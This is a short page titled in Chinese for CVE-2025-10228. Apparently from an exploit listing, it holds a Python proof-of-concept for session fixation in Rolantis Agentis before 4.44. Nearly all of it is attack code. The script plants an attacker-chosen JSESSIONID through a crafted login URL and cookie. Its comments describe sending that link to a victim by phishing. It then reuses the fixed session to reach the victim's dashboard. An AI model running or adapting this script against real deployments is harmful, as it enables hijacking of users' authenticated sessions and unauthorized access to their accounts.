CVE-2025-10228：Agentis会话固定漏洞导致会话劫持

# CVE-2025-10228 - Agentis Session Fixation PoC # Vulnerability: Session Fixation leading to Session Hijacking # Affected: Rolantis Agentis < 4.44 import requests from urllib.parse import urljoin TARGET_URL = "https://target-agentis.com" LOGIN_ENDPOINT = "/login" ATTACKER_SESSION = "ATTACKER_CONTROLLED_SESSION_12345" # Step 1: Attacker obtains a session by visiting the target application session = requests.Session() response = session.get(TARGET_URL) # Step 2: Attacker crafts a malicious URL with a fixed session ID # The session ID is injected via URL parameter or cookie malicious_url = f"{TARGET_URL}{LOGIN_ENDPOINT};jsessionid={ATTACKER_SESSION}" print(f"[+] Malicious URL crafted: {malicious_url}") # Step 3: Attacker sends the malicious link to the victim (via phishing) # Victim clicks the link and authenticates using the fixed session ID victim_session = requests.Session() victim_session.cookies.set("JSESSIONID", ATTACKER_SESSION) login_payload = { "username": "victim_user", "password": "victim_password" } auth_response = victim_session.post(malicious_url, data=login_payload) # Step 4: Attacker reuses the same session ID to hijack the authenticated session attacker_hijack = requests.Session() attacker_hijack.cookies.set("JSESSIONID", ATTACKER_SESSION) dashboard = attacker_hijack.get(urljoin(TARGET_URL, "/dashboard")) if dashboard.status_code == 200 and "Welcome" in dashboard.text: print("[!] Session Hijacking successful - Attacker now has access to victim's session") else: print("[-] Exploit failed")